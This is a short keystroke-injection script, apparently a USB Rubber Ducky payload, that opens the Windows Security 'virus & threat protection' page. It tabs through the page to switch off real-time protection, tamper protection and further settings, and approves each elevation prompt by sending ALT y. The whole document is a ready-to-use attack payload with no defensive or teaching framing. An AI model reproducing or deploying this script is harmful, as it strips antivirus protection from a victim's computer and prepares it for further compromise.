REM Author : @Rishie
REM This Script Will Disable Real Time Protection
REM *********************
REM We're going to disable Real Time Protection
REM Aswell as tamper protection and other stuff
REM *********************
DELAY 1000
GUI 
DELAY 500
STRING virus & threat protection
ENTER
DELAY 3000
TAB 
TAB
TAB
TAB
DELAY 200
ENTER
DELAY 200
SPACE 
DELAY 3000
ALT y
DELAY 200
TAB
DELAY 200
SPACE
DELAY 3000
ALT y
DELAY 200
TAB
DELAY 200
SPACE
DELAY 3000
ALT y
DELAY 200
TAB
TAB
DELAY 200
SPACE
DELAY 3000
ALT y
DELAY 200
STRING exit
ENTER